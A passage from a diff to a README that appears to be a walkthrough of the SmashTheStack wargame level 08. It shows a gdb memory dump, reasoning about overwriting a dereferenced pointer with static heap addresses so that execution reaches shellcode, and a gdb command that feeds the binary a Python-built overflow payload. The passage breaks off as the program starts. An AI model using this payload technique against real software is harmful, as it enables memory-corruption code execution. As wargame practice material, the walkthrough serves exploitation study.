klarkk3nt/smashthestack/level08/README.md

 0x804a0b8:    0x43434343  0x43434343  0x43434343  0x43434343
 ```

 So we're about to deref 0x42424242.
 We should make it deref eax+4 (0x804a07c) so that eax ends up pointing to 0x43434343.
 Then we can replace those four Cs with eax+8 (0x804a080).
-And we can have our shellcode follow right afterwards because these addresses remain static.
+And we can have our shellcode follow right afterwards because these addresses are static.
 Let's replace those eight bytes and see how it works out.
 ```
 (gdb) run $(python -c 'print "A"*108 + "\x7c\xa0\x04\x08" + "\x80\xa0\x04\x08" + "C"*100')
 The program being debugged has been started already.